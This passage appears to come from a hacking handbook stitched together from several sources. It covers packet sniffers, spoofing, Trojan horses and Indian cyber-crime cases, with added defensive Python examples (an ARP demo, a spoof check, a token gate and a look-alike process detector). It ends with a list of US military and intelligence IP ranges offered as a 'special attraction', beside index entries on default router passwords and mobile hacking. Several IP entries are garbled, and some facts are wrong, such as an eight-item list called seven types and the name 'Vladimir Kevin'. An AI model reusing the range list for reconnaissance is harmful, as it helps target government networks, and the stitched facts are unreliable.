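        raise ValueError("not IPv4-over-Ethernet ARP")
    return {"op": "request" if op == 1 else "reply",
            "sender_mac": sha, "sender_ip": ".".join(map(str, spa)),
            "target_mac": tha, "target_ip": ".".join(map(str, tpa))}


def nic_accepts(frame: dict, own_mac: bytes, promiscuous: bool) -> bool:
    """The filter a card applies before a frame ever reaches the OS."""
    if promiscuous:                      # sniffer mode: take everything on the wire
        return True
    dst = frame["dst"]
    is_group = bool(dst[0] & 0x01)       # I/G bit set => multicast or broadcast
    return dst == own_mac or dst == BROADCAST or is_group


def learn_arp(cache: dict, frame: dict) -> dict:
    """Add the sender's IP -> MAC binding from an ARP reply to the cache."""
    if frame["ethertype"] == ETHERTYPE_ARP:
        arp = parse_arp(frame["payload"])
        if arp["op"] == "reply":
            cache[arp["sender_ip"]] = arp["sender_mac"]
    return cache


def run_demo() -> dict:
    """A resolves B's MAC while C listens; returns what each party observed."""
    # 1. A does not know B's MAC yet: ARP request to the broadcast address.
    request = parse_ethernet(build_frame(
        BROADCAST, MAC_A, ETHERTYPE_ARP,
        build_arp(1, MAC_A, IP_A, bytes(6), IP_B)))
    # 2. B answers A directly (unicast frame to MAC_A).
    reply = parse_ethernet(build_frame(
        MAC_A, MAC_B, ETHERTYPE_ARP,
        build_arp(2, MAC_B, IP_B, MAC_A, IP_A)))
    cache_a = learn_arp({}, reply)
    return {
        "request_seen_by_c_normal": nic_accepts(request, MAC_C, promiscuous=False),
        "reply_seen_by_c_normal": nic_accepts(reply, MAC_C, promiscuous=False),
        "reply_seen_by_c_promisc": nic_accepts(reply, MAC_C, promiscuous=True),
        "a_cache": {ip: mac.hex() for ip, mac in cache_a.items()},
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The broadcast ARP request reaches every card on the segment, but the unicast reply reaches the third host only once its card is in promiscuous mode, which is exactly the difference a sniffer exploits.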
Well-known packet sniffers
• AiroPeek
• dSniff
• Ethereal
• EtherPeek
• Ettercap
• Kismet
• Javvin Packet Analyzer
• NetStumbler
• Network General Sniffer
• Network Instruments Observer
• OmniPeek
• PRTG
• snoop (Solaris)
• tcpdump
• Wireshark (formerly known as Ethereal[1])
• WPE (Winsock packet editor)
Spoofing attack
In the context of network security, a spoofing attack is a situation in which one person or program successfully masquerades as another by falsifying data and thereby gains an illegitimate advantage.
Man-in-the-middle attack and internet protocol spoofing
An example from cryptography is the man-in-the-middle attack, in which an attacker spoofs Alice into believing he's Bob, and spoofs Bob into believing he's Alice, thus gaining access to all messages in both directions without the trouble of any cryptanalytic effort.
The attacker must monitor the packets sent from Alice to Bob and then guess the sequence number of the packets. Then the attacker knocks out Alice with a SYN attack and injects his own packets, claiming to have the address of Alice. Alice's firewall can defend against some spoof attacks when it has been configured with knowledge of all the IP addresses connected to each of its interfaces. It can then detect a spoofed packet if it arrives at an interface that is not known to be connected to the IP address. Many carelessly designed protocols are subject to spoof attacks, including many of those used on the Internet. See Internet protocol spoofing.
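The interface-aware spoof check that the text attributes to Alice's firewall, as an added example that is not from the original article: the firewall is told which address ranges legitimately sit behind each interface, and a packet is accepted only if its source address is plausible for the interface it arrived on. The interface names, prefixes and sample packets are all constructed for this example.

```python
import ipaddress
from dataclasses import dataclass

# Constructed topology: two inside networks and one uplink to the Internet.
INSIDE_PREFIXES = {
    "eth0": [ipaddress.ip_network("192.168.1.0/24")],   # office LAN
    "eth1": [ipaddress.ip_network("10.10.0.0/16")],     # server segment
}
UPLINK = "eth2"


@dataclass(frozen=True)
class Packet:
    iface: str   # interface the packet arrived on
    src: str     # claimed source address
    dst: str


def interface_for(src):
    """Return the inside interface that owns src, or None if it is external."""
    for iface, prefixes in INSIDE_PREFIXES.items():
        if any(src in p for p in prefixes):
            return iface
    return None


def classify(pkt: Packet) -> str:
    """Return 'ok' or a 'spoofed: ...' reason for one packet."""
    src = ipaddress.ip_address(pkt.src)
    # Addresses that can never be a legitimate source on the wire.
    if src.is_loopback or src.is_multicast or src.is_unspecified:
        return "spoofed: bogus source address"
    owner = interface_for(src)
    if owner is None:
        # External address: only believable if it came in on the uplink.
        if pkt.iface == UPLINK:
            return "ok"
        return f"spoofed: external source on inside interface {pkt.iface}"
    if owner == pkt.iface:
        return "ok"
    # Inside address arriving on the wrong interface: the classic case of an
    # outside packet claiming to come from a trusted host.
    return f"spoofed: {src} belongs to {owner} but arrived on {pkt.iface}"


def audit(packets) -> dict:
    """Classify every packet; returns {packet: verdict}."""
    return {pkt: classify(pkt) for pkt in packets}


# Constructed sample traffic.
SAMPLE = [
    Packet("eth0", "192.168.1.25", "10.10.3.4"),     # genuine LAN host
    Packet("eth2", "203.0.113.7", "192.168.1.25"),   # genuine Internet host
    Packet("eth2", "192.168.1.25", "10.10.3.4"),     # outsider claiming a LAN address
    Packet("eth0", "203.0.113.7", "10.10.3.4"),      # insider forging an external source
    Packet("eth2", "127.0.0.1", "10.10.3.4"),        # bogus source
]

if __name__ == "__main__":
    for pkt, verdict in audit(SAMPLE).items():
        print(f"{pkt.iface:5} {pkt.src:>14} -> {pkt.dst:<14} {verdict}")
```

The check only sees the interface a packet came in on, so it catches the case the text describes (an inside address arriving from outside) but says nothing about a packet whose forged source is another external host.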
URL spoofing and phishing
Another kind of spoofing is "webpage spoofing," also known as phishing. In this attack, a legitimate web page such as a bank's site is reproduced in "look and feel" on another server under control of the attacker. The intent is to fool the users into thinking that they are connected to a trusted site, for instance to harvest user names and passwords. This attack is often performed with the aid of URL spoofing, which exploits web browser bugs in order to display incorrect URLs in the browser's location bar; or with DNS cache poisoning in order to direct the user away from the legitimate site and to the fake one. Once the user puts in their password, the attack-code reports a password error, then redirects the user back to the legitimate site.
Referer spoofing
Some websites, especially pornographic paysites, allow access to their materials only from certain approved (login) pages. This is enforced by checking the Referer header of the HTTP request. This Referer header, however, can be changed (known as "Referer spoofing" or "Ref-tar spoofing"), allowing users to gain unauthorized access to the materials.
Poisoning of file-sharing networks
"Spoofing" can also refer to copyright holders placing distorted or unlistenable versions of works on file-sharing networks, to discourage downloading from these sources.
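Why the Referer check described above is not access control, shown as an added example that is not from the original article: referer_gate() is the weak scheme (it grants access when a client-supplied header names an approved login page), while token_gate() requires an HMAC-signed, expiring token that only the login page holding SECRET can issue. The secret, URLs and request headers are constructed for this example.

```python
import hmac
import hashlib
import time

APPROVED_PAGES = ("https://example.test/login",)
SECRET = b"constructed-demo-secret-change-me"   # held only by the server


def referer_gate(headers: dict) -> bool:
    """Weak: trusts a header that the client itself fills in."""
    referer = headers.get("Referer", "")
    return any(referer.startswith(page) for page in APPROVED_PAGES)


def issue_token(user: str, now: int, ttl: int = 600) -> str:
    """Issued by the login page after a successful login."""
    expires = now + ttl
    sig = hmac.new(SECRET, f"{user}:{expires}".encode(), hashlib.sha256).hexdigest()
    return f"{user}:{expires}:{sig}"


def token_gate(headers: dict, now: int) -> bool:
    """Strong: verifies a server-signed, time-limited token."""
    token = headers.get("X-Access-Token", "")
    try:
        user, expires, sig = token.rsplit(":", 2)
        expires = int(expires)
    except ValueError:
        return False
    if now >= expires:
        return False
    expected = hmac.new(SECRET, f"{user}:{expires}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, sig)   # constant-time comparison


def evaluate(now: int) -> dict:
    """Run both gates over constructed requests; returns who gets in."""
    genuine = {"Referer": "https://example.test/login",
               "X-Access-Token": issue_token("alice", now)}
    forged_referer = {"Referer": "https://example.test/login"}     # header set by hand
    forged_token = {"X-Access-Token": "alice:9999999999:" + "0" * 64}
    stale = {"X-Access-Token": issue_token("alice", now - 1000)}   # expired 400 s ago
    return {
        "referer_gate": {"genuine": referer_gate(genuine),
                         "forged_referer": referer_gate(forged_referer)},
        "token_gate": {"genuine": token_gate(genuine, now),
                       "forged_referer": token_gate(forged_referer, now),
                       "forged_token": token_gate(forged_token, now),
                       "stale": token_gate(stale, now)},
    }


if __name__ == "__main__":
    print(evaluate(int(time.time())))
```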
Caller ID spoofing
In public telephone networks, it has for a long while been possible to find out who is calling you by looking at the Caller ID information that is transmitted with the call. There are technologies that transmit this information on landlines, on cellphones and also with VoIP. Unfortunately, there are now technologies (especially associated with VoIP) that allow callers to lie about their identity, and present false names and numbers, which could of course be used as a tool to defraud or harass. Because there are services and gateways that interconnect VoIP with other public phone networks, these false Caller IDs can be transmitted to any phone on the planet, which makes the whole Caller ID information now next to useless. Due to the distributed geographic nature of the Internet, VoIP calls can be generated in a different country to the receiver, which means that it is very difficult to have a legal framework to control those who would use fake Caller IDs as part of a scam.
Trojan horse
Example of a simple Trojan horse
A simple example of a trojan horse would be a program named "waterfalls.scr" claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the victim's computer.
Types of Trojan horses
Trojan horses are almost always designed to do various harmful things, but could be harmless. They are broken down in classification based on how they breach systems and the damage they cause. The seven main types of Trojan horses are:
• Remote Access Trojans
• Data Sending Trojans
• Destructive Trojans
• Proxy Trojans
• FTP Trojans
• security software disabler Trojans
• denial-of-service attack (DoS) Trojans
• URL Trojans
Some examples are:
• erasing or overwriting data on a computer.
• encrypting files in a cryptoviral extortion attack.
• corrupting files in a subtle way.
• upload and download files.
• allowing remote access to the victim's computer. This is called a RAT (remote administration tool).
• spreading other malware, such as viruses. In this case the Trojan horse is called a 'dropper' or 'vector'.
• setting up networks of zombie computers in order to launch DDoS attacks or send spam.
• spying on the user of a computer and covertly reporting data like browsing habits to other people (see the article on spyware).
• make screenshots.
• logging keystrokes to steal information such as passwords and credit card numbers (also known as a keylogger).
• phish for bank or other account details, which can be used for criminal activities.
• installing a backdoor on a computer system.
• opening and closing CD-ROM tray.
• harvest e-mail addresses and use them for spam.
• Restarts the computer whenever the infected program is started.
Time bombs and logic bombs
"Time bombs" and "logic bombs" are types of trojan horses. "Time bombs" activate on particular dates and/or times. "Logic bombs" activate on certain conditions met by the computer.
Droppers
Droppers perform two tasks at once. A dropper performs a legitimate task but also installs a computer virus or a computer worm on a system or disk at the same time.
Precautions against Trojan horses
Trojan horses can be protected against through end-user awareness. Trojan Horse viruses can cause a great deal of damage to a personal computer but even more damage to a business, particularly a small business that usually does not have the same virus protection capabilities as a large business. Since a Trojan Horse virus is hidden, it is harder to protect yourself or your company from it, but there are things that you can do. Trojan Horses are most commonly spread through e-mail, much like other types of common viruses. The only difference, of course, is that a Trojan Horse is hidden. The best ways to protect yourself and your company from Trojan Horses are as follows:
1. If you receive e-mail from someone that you do not know or you receive an unknown attachment, never open it right away. As an e-mail user you should confirm the source. Some hackers have the ability to steal address books, so if you see e-mail from someone you know, it is not necessarily safe.
2. When setting up your e-mail client, make sure that you have the settings so that attachments do not open automatically. Some e-mail clients come ready with an anti-virus program that scans any attachments before they are opened. If your client does not come with this, it would be best to purchase one or download one for free.
3. Make sure your computer has an anti-virus program on it and update it regularly. If you have an auto-update option included in your anti-virus program you should turn it on; that way if you forget to update your software you can still be protected from threats.
4. Operating systems offer patches to protect their users from certain threats and viruses, including Trojan Horses. Software developers like Microsoft offer patches that in a sense "close the hole" that the Trojan horse or other virus would use to get through to your system. If you keep your system updated with these patches, your computer is kept much safer.
5. Avoid using peer-to-peer or P2P sharing networks like Kazaa, Limewire, Ares, or Gnutella because they are generally unprotected from viruses and Trojan Horse viruses spread through them especially easily. Some of these programs do offer some virus protection, but this is often not strong enough. If you insist on using P2P, it would be safe to not download files that claim to be "rare" songs, books, movies, pictures, etc.
Besides these sensible precautions, one can also install anti-trojan software, some of which is offered free.
Methods of Infection
The majority of trojan horse infections occur because the user was tricked into running an infected program. This is why it is advised not to open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a trojan or worm. The infected program doesn't have to arrive via email, though; it can be sent to you in an Instant Message, downloaded from a Web site or by FTP, or even delivered on a CD or floppy disk. (Physical delivery is uncommon, but if you were the specific target of an attack, it would be a fairly reliable way to infect your computer.) Furthermore, an infected program could come from someone who sits down at your computer and loads it manually.
Websites: You can be infected by visiting a rogue website.
Email: If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly.
Open ports: Computers running their own servers (HTTP, FTP, or SMTP, for example), allowing Windows file sharing, or running programs that provide filesharing capabilities such as Instant Messengers (AOL's AIM, MSN Messenger, etc.) may have vulnerabilities similar to those described above. These programs and services may open a network port giving attackers a means for interacting with these programs from anywhere on the Internet. Vulnerabilities allowing unauthorized remote entry are regularly found in such programs, so they should be avoided or properly secured. A firewall may be used to limit access to open ports.
Firewalls are widely used in practice, and they help to mitigate the problem of remote trojan insertion via open ports, but they are not a totally impenetrable solution either. Some modern trojans arrive through instant messengers as a very important-looking message that carries the trojan; their executable files are named the same as, or look the same as, Windows system processes such as 'Svchost.exe'. Some of these look-alike trojans are:
• Svchost32.exe
• Svhost.exe
• back.exe
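One way to flag processes whose names imitate Windows system processes, as the look-alike trojans listed above do, given as an added example that is not from the original article: it reports a name that is nearly but not exactly a known system process name (edit distance 1 or 2, e.g. 'Svhost.exe'), and an exact system name running from somewhere other than its expected directory. The expected-directory map and the sample process list are constructed for this example.

```python
# Constructed map: system process name -> directory it normally runs from.
SYSTEM_PROCESSES = {
    "svchost.exe":  r"c:\windows\system32",
    "lsass.exe":    r"c:\windows\system32",
    "csrss.exe":    r"c:\windows\system32",
    "explorer.exe": r"c:\windows",
}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert/delete/substitute), case-insensitive."""
    a, b = a.lower(), b.lower()
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def assess(name: str, directory: str) -> str:
    """Return 'ok', 'unknown', or a description of why the process is suspect."""
    lname, ldir = name.lower(), directory.lower().rstrip("\\")
    if lname in SYSTEM_PROCESSES:
        if ldir == SYSTEM_PROCESSES[lname]:
            return "ok"
        return f"system name '{name}' running from unexpected directory {directory}"
    # Not a system name: is it within two edits of one?
    near = [s for s in SYSTEM_PROCESSES if 0 < edit_distance(lname, s) <= 2]
    if near:
        return f"look-alike of {near[0]}"
    return "unknown"


def scan(processes) -> list:
    """processes: iterable of (name, directory); returns (name, directory, verdict)."""
    return [(name, d, assess(name, d)) for name, d in processes]


# Constructed process list, including the names from the text above.
SAMPLE = [
    ("svchost.exe", r"C:\Windows\System32"),
    ("Svchost32.exe", r"C:\Users\bob\AppData\Local\Temp"),
    ("Svhost.exe", r"C:\Users\bob\AppData\Local\Temp"),
    ("svchost.exe", r"C:\Users\bob\AppData\Local\Temp"),
    ("back.exe", r"C:\Users\bob\Downloads"),
]

if __name__ == "__main__":
    for name, directory, verdict in scan(SAMPLE):
        print(f"{name:15} {directory:35} {verdict}")
```

A name with no resemblance to a system process, such as back.exe, is reported as 'unknown' rather than clean; the directory and signature checks of a real endpoint tool are what decide those cases.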
Well-known trojan horses
• Back Orifice
• Back Orifice 2000
• NetBus
• SubSeven
• Downloader-EV
• Pest Trap
• AIDS
• Beast Trojan
• Bifrose
• Insurrection
• Optix Pro
• Poison Ivy
• ProRat
• Sub7
• EGABTR
• RemoteHAK
• A-311 Death
• A4zeta
• Abacab
• Acessor
• AcidBattery
• Acid Drop
• AcidHead
• Acid Kor
• Acidsena
• AcidShivers
• Acid Trojan Horse
• AckCmd
• Acojonaor
• Acropolis
• Admin.Troj.Kikzyurarse
• Advertiser Bot
• AeonwindDoll
• Afcore
• A-FTP
• AF
• Agent 40421
• AH
• Aibolit
• AIMaster
• AIM Filter
• AimFrame
• aim P
• Aim Password Stealer
• AIM Pws
• AimRat
• AIM Robber
• AIM Spy
• AIMVision
• AIR
• AirBot
• Akosch
• Aladino
• Al-Bareki
• Alcatraz
• Alerter
• AlexMessoMalex
• Alicia
• Alien Hacker
• Alien Spy
• Almaster
• Almetyevsk
• Almq
• Alex
• Alofin
• Alop
• Alph
• AlphaDog
• Alvgus
• Amanda
• Amiboide Uploader
• Ambush
• AmigaAnywhere
• Amitis
• Amoeba
• AMRC
• AMS
• Anal FTP
• Anal Ra
• AnarchoIntruder
• Andromeda
• A New Trojan
• Angelfire
• AngelShell
• Annoy Toys
• Anthena
• Anti Danger
• Anti-Denial
• AntiMks
• AntiPC
• AntiLamer Backdoor
• Anti MSN
• Antylamus
• AolAdmin
• Apdoor
• Aphex's FTP
• Aphex's Remote Packet Sniffer
• Aphex tunneld 2.0
• AppServ
• APRE
• Aqua
• Arcanum
• Area Control
• Ares Invader
• Armageddon
• arplhmd
• Arranca
• Arsd
• Artic
• Arturik
• AsbMay
• A.S.H.
• Ashley
• Ass4ss1n
• Assasin
• Asylum
• Atentator
• A-Trojan
• Attack FTP
• Atwinda
• AudioDoor
• Autocrat
• AutoPWN
• Autograph
• AutoSpY
• Avanzado
• Avone
• Ayan Bilisim
• Azrael
• BD Blade runner 0.80a
• Crazy Daisy
• Connect4
• Donald Dick
• Flatley Trojan
• Theef
• Twelve Tricks
Introduction to Cyber Crime
The first recorded cyber crime took place in the year 1820! That is not surprising considering the fact that the abacus, which is thought to be the earliest form of a computer, has been around since 3500 B.C. in India, Japan and China. The era of modern computers, however, began with the analytical engine of Charles Babbage. In 1820, Joseph-Marie Jacquard, a textile manufacturer in France, produced the loom. This device allowed the repetition of a series of steps in the weaving of special fabrics. This resulted in a fear amongst Jacquard's employees that their traditional employment and livelihood were being threatened. They committed acts of sabotage to discourage Jacquard from further use of the new technology. This is the first recorded cyber crime!
Today computers have come a long way, with neural networks and nano-computing promising to turn every atom in a glass of water into a computer capable of performing a billion operations per second. Cyber crime is an evil having its origin in the growing dependence on computers in modern life. In a day and age when everything from microwave ovens and refrigerators to nuclear power plants is being run on computers, cyber crime has assumed rather sinister implications. Major cyber crimes in the recent past include the Citibank rip off. US $10 million were fraudulently transferred out of the bank and into a bank account in Switzerland. A Russian hacker group led by Vladimir Kevin, a renowned hacker, perpetrated the attack. The group compromised the bank's security systems. Vladimir was allegedly using his office computer at AO Saturn, a computer firm in St. Petersburg, Russia, to break into Citibank computers. He was finally arrested at Heathrow airport on his way to Switzerland.
Defining Cyber Crime
At the onset, let us satisfactorily define "cyber crime" and differentiate it from "conventional crime". Computer crime can involve criminal activities that are traditional in nature, such as theft, fraud, forgery, defamation and mischief, all of which are subject to the Indian Penal Code. The abuse of computers has also given birth to a gamut of new age crimes that are addressed by the Information Technology Act, 2000. Defining cyber crimes as "acts that are punishable by the Information Technology Act" would be unsuitable as the Indian Penal Code also covers many cyber crimes, such as email spoofing and cyber defamation, sending threatening emails etc. A simple yet sturdy definition of cyber crime would be "unlawful acts wherein the computer is either a tool or a target or both". Let us examine the acts wherein the computer is a tool for an unlawful act. This kind of activity usually involves a modification of a conventional crime by using computers. Some examples are:
Financial crimes
This would include cheating, credit card frauds, money laundering etc. To cite a recent case, a website offered to sell Alphonso mangoes at a throwaway price. Distrusting such a transaction, very few people responded to or supplied the website with their credit card numbers. These people were actually sent the Alphonso mangoes. The word about this website now spread like wildfire. Thousands of people from all over the country responded and ordered mangoes by providing their credit card numbers. The owners of what was later proven to be a bogus website then fled taking the numerous credit card numbers and proceeded to spend huge amounts of money, much to the chagrin of the card owners.
Cyber pornography
This would include pornographic websites; pornographic magazines produced using computers (to publish and print the material) and the Internet (to download and transmit pornographic pictures, photos, writings etc). Recent Indian incidents revolving around cyber pornography include the Air Force Balbharati School case. A student of the Air Force Balbharati School, Delhi, was teased by all his classmates for having a pockmarked face. Tired of the cruel jokes, he decided to get back at his tormentors. He scanned photographs of his classmates and teachers, morphed them with nude photographs and put them up on a website that he uploaded on to a free web hosting service. It was only after the father of one of the class girls featured on the website objected and lodged a complaint with the police that any action was taken. In another incident, in Mumbai a Swiss couple would gather slum children and then would force them to appear for obscene photographs. They would then upload these photographs to websites specially designed for paedophiles. The Mumbai police arrested the couple for pornography.
Sale of illegal articles
This would include sale of narcotics, weapons and wildlife etc., by posting information on websites, auction websites, and bulletin boards or simply by using email communication. E.g. many of the auction sites even in India are believed to be selling cocaine in the name of 'honey'.
Online gambling
There are millions of websites, all hosted on servers abroad, that offer online gambling. In fact, it is believed that many of these websites are actually fronts for money laundering.
Intellectual Property crimes
These include software piracy, copyright infringement, trademarks violations, theft of computer source code etc.
Email spoofing
A spoofed email is one that appears to originate from one source but actually has been sent from another source. E.g. Pooja has an e-mail address [email protected]. Her enemy, Sameer, spoofs her e-mail and sends obscene messages to all her acquaintances. Since the emails appear to have originated from Pooja, her friends could take offence and relationships could be spoiled for life. Email spoofing can also cause monetary damage. In an American case, a teenager made millions of dollars by spreading false information about certain companies whose shares he had short sold. This misinformation was spread by sending spoofed emails, purportedly from news agencies like Reuters, to share brokers and investors who were informed that the companies were doing very badly. Even after the truth came out the values of the shares did not go back to the earlier levels and thousands of investors lost a lot of money.
Forgery
Counterfeit currency notes, postage and revenue stamps, mark sheets etc. can be forged using sophisticated computers, printers and scanners. Outside many colleges across India, one finds touts soliciting the sale of fake mark sheets or even certificates. These are made using computers, and high quality scanners and printers. In fact, this has become a booming business involving thousands of Rupees being given to student gangs in exchange for these bogus but authentic-looking certificates.
Cyber Defamation
This occurs when defamation takes place with the help of computers and / or the Internet. E.g. someone publishes defamatory matter about someone on a website or sends emails containing defamatory information to all of that person's friends.
In a recent occurrence, Surekha (names of people have been changed), a young girl was about to be married to Suraj. She was really pleased because despite it being an arranged marriage, she had liked the boy. He had seemed to be open-minded and pleasant. Then, one day when she met Suraj, he looked worried and even a little upset. He was not really interested in talking to her. When asked, he told her that members of his family had been receiving e-mails that contained malicious things about Surekha's character. Some of them spoke of affairs which she had had in the past. He told her that his parents were justifiably very upset and were also considering breaking off the engagement. Fortunately, Suraj was able to prevail upon his parents and the other elders of his house to approach the police instead of blindly believing what was contained in the mails. During investigation, it was revealed that the person sending those e-mails was none other than Surekha's stepfather. He had sent these emails so as to break up the marriage. The girl's marriage would have caused him to lose control of her property of which he was the guardian till she got married. Another famous case of cyber defamation occurred in America. All friends and relatives of a lady were beset with obscene e-mail messages appearing to originate from her account. These mails were giving the lady in question a bad name among her friends. The lady was an activist against pornography. In reality, a group of people displeased with her views and angry with her for opposing them had decided to get back at her by using such underhanded methods. In addition to sending spoofed obscene e-mails they also put up websites about her that basically maligned her character and sent e-mails to her family and friends containing matter defaming her.
Cyber stalking
The Oxford dictionary defines stalking as "pursuing stealthily". Cyber stalking involves following a person's movements across the Internet by posting messages (sometimes threatening) on the bulletin boards frequented by the victim, entering the chat-rooms frequented by the victim, constantly bombarding the victim with emails etc.
Index
• IP Address
• Default Router Password
• Net BIOS
• Mobile Hacking
Special attraction
Government, military and intelligence IP range.
134.240.0.0
U.S. Military Academy
136.149.0.0
Air Force Military Personnel Center
RANGE 136 136.178.0.0
NASA Research Network
136.188.0.0 - 136.197.255.255 136.207.0.0
Defense Intelligence Agency
69th Signal Battalion 74
136.208.0.0
HQ, 5th Signal Command
136.209.0.0
HQ 5th Signal Command
136.210.0.0
HQ 5th Signal Command
136.212.0.0
HQ 5th Signal Command
136.213.0.0
HQ, 5th Signal Command
136.214.0.0
HQ, 5th Signal Command
136.215.0.0
HQ, 5th Signal Command
136.216.0.0
HQ, 5th Signal Command
136.217.0.0
HQ, 5th Signal Command
136.218.0.0
HQ, 5th Signal Command
136.219.0.0
HQ, 5th Signal Command
136.220.0.0
HQ, 5th Signal Command
136.221.0.0
HQ, 5th Signal Command
136.222.0.0
HQ, 5th Signal Command
RANGE 137 137.1.0.0 37.2.0.0 137.3.0.0
Whiteman Air Force Base George Air Force Base Little Rock Air Force Base \
137.4.0.0 - 137.4.255.255
437 CS/SC
137.5.0.0
Air Force Concentrator Network
137.6.0.0
Air Force Concentrator Network
137.11.0.0
HQ AFSPC/SCNNC
137.12.0.0
Air Force Concentrator Network
137.17.* National Aerospace Laboratory 137.24.0.0
Naval Surface Warfare Center
137.29.0.0
First Special Operations Command
137.67.0.0
Naval Warfare Assessment Center
137.94.* Royal Military College 137.95.* Headquarters, U.S. European Command 137.126.0.0
USAF MARS
137.127.* Army Concepts Analysis Agency 137.128.* U.S. ARMY Tank-Automotive Tank-Automotive Command 75
137.130.0.0
Defense Information Systems Agency
137.209.0.0
Defense Information Systems Agency
137.210.0.0
Defense Information Systems Agency
137.211.0.0
Defense Information Systems Agency
137.212.0.0
Defense Information Systems Agency
137.231.0.0
HQ 5th Signal Command
137.232.0.0
Defense Information Systems Agency
137.233.0.0
Defense Information Systems Agency
137.234.0.0
Defense Information Systems Agency
137.235.0.0
Defense Information Systems Agency
137.240.0.0
Air Force Materiel Command
137.241.0.0
75 ABW
137.242.0.0
Air Force Logistics Command
137.243.0.0
77 CS/SCCN
137.244.0.0
78 CS/SCSC
137.245.0.0
Wright Wright Patterson Air Force Base
137.246.0.0
United States Atlantic Command Joint Training
RANGE 139 39.31.0.0
20th Tactical Fighter Wing
139.32.0.0
48th Tactical Fighter Wing
139.33.0.0
36th Tactical Fighter Wing
139.34.0.0
52nd Tactical Fighter Wing
139.35.0.0
50th Tactical Fighter Wing
139.36.0.0
66th Electronic Combat Wing
139.37.0.0
26th Tactical Reconnaissance Wing |
139.38.0.0
32nd Tactical Fighter Squadron
139.40.0.0
10th Tactical Fighter Wing
139.41.0.0
39th Tactical Air Control Group
139.42.0.0
40th Tactical Air Control Group
139.43.0.0
401st Tactical Fighter Wing
139.124.* Reseau Infomratique 76
RANGE 143 143.45.0.0
58th Signal Battalion
143.46.0.0
U.S. Army, Army, 1141st Signal Battalion
143.68.0.0
Headquarters, USAISC
143.69.0.0
Headquarters, USAAISC
143.70.0.0
Headquarters, USAAISC
143.71.0.0
Headquarters, USAAISC
143.72.0.0
Headquarters, USAAISC
143.73.0.0
Headquarters, USAAISC
143.74.0.0
Headquarters, USAAISC
143.75.0.0
Headquarters, USAAISC
143.76.0.0
Headquarters, USAAISC
143.77.0.0
Headquarters, USAAISC
143.78.0.0
Headquarters, USAAISC
143.79.0.0
Headquarters, USAAISC
143.80.0.0
Headquarters, USAAISC
143.81.0.0
Headquarters, USAAISC
143.82.0.0
Headquarters, USAAISC
143.84.0.0
Headquarters, USAAISC
143.85.0.0
Headquarters, USAAISC
143.86.0.0
Headquarters, USAAISC
143.87.0.0
Headquarters, USAAISC
143.232.0.0
NASA Ames Research Center
RANGE 144 144.99.0.0
United States Army Information Systems Command
144.109.0.0
Army Information Systems Command
144.143.0.0
Headquarters, Third United States Army
144.144.0.0
Headquarters, Third United States Army
144.146.0.0
Commander, Army Information Systems Center
144.147.0.0
Commander, Army Information Systems Center
144.170.0.0
HQ, 5th Signal Command
144.192.0.0
United States Army Information Services Command-Campbell
144.233.0.0
Defense Intelligence Agency 77
144.234.0.0
Defense Intelligence Agency
144.235.0.0
Defense Intelligence Agency
144.236.0.0
Defense Intelligence Agency
144.237.0.0
Defense Intelligence Agency
144.238.0.0
Defense Intelligence Agency
144.239.0.0
Defense Intelligence Agency
144.240.0.0
Defense Intelligence Agency
144.241.0.0
Defense Intelligence Agency
144.242.0.0
Defense Intelligence Agency
144.252.0.0
U.S. Army LABCOM
RANGE 146 146.17.0.0
HQ, 5th Signal Command
146.80.0.0
Defence Research Agency
146.98.0.0
HQ United States European Command
46.154.0.0
NASA/Johnson Space Center
146.165.0.0
NASA Langley Research Center
RANGE 147 147.35.0.0
HQ, 5th Signal Command
147.36.0.0
HQ, 5th Signal Command
147.37.0.0
HQ, 5th Signal Command
147.38.0.0
HQ, 5th Signal Command
147.39.0.0
HQ, 5th Signal Command
147.40.0.0
HQ, 5th Signal Command
147.42.0.0
Army CALS Project
147.103.0.0
Army Information Systems Software Center
147.104.0.0
Army Information Systems Software Center
147.159.0.0
Naval Air Warfare Center, Aircraft Division
147.168.0.0
Naval Surface Warfare Center
147.169.0.0
HQ, 5th Signal Command
147.198.0.0
Army Information Systems Command
147.199.0.0
Army Information Systems Command
47.238.0.0
Army Information Systems Command 78
147.239.0.0
1112th 1112th Signal Battalion
147.240.0.0
US Army Tank-Automotive Command
147.242.0.0
19th Support Command
147.248.0.0
Fort Monroe DOIM
147.254.0.0
7th Communications Group
RANGE 148 148.114.0.0
NASA, Stennis Space Center
RANGE 150 150.113.0.0
1114th Signal Battalion
150.114.0.0
1114th Signal Battalion
150.125.0.0
Space and Naval Warfare Command
150.133.0.0
10th Area Support Group
150.144.0.0
NASA Goodard Space Flight Center
150.149.0.0
Army Information Systems Command
150.157.0.0
USAISC-Fort Lee
150.184.0.0
Fort Monroe DOIM
150.190.0.0
USAISC-Letterkenny
150.196.0.0
USAISC-LABCOM
RANGE 152 152.82.0.0
7th Communications Group of the Air Force
152.151.0.0
U.S. Naval Space & Naval Warfare Systems Command
152.152.0.0
NATO NATO Headquarters
152.154.0.0
Defense Information Systems Agency
152.229.0.0
Defense MegaCenter (DMC) Denver
RANGE 153 153.21.0.0
USCENTAF/SCM
153.22.0.0
USCENTAF/SCM
153.28.0.0
USCENTAF/SCM
153.29.0.0
USCENTAF/SCM
153.30.0.0
USCENTAF/SCM 79
153.31.0.0
Federal Bureau of Investigation
RANGE 155 155.5.0.0
1141st Signal Bn
155.6.0.0
1141st Signal Bn
155.77.0.0
PEO STAMIS STAMIS
155.78.0.0
PEO STAMIS STAMIS
155.79.0.0
US Army Corps of Engineers
155.80.0.0
PEO STAMIS STAMIS
155.81.0.0
PEO STAMIS STAMIS
155.82.0.0
PEO STAMIS STAMIS
155.83.0.0
US Army Corps of Enginers
155.84.0.0
PEO STAMIS STAMIS
155.85.0.0
PEO STAMIS STAMIS
155.86.0.0
US Army Corps of Engineers
155.87.0.0
PEO STAMIS STAMIS
155.88.0.0
PEO STAMIS STAMIS
155.96.0.0
Drug Enforcement Administration
155.149.0.0
1112th 1112th Signal Battalion
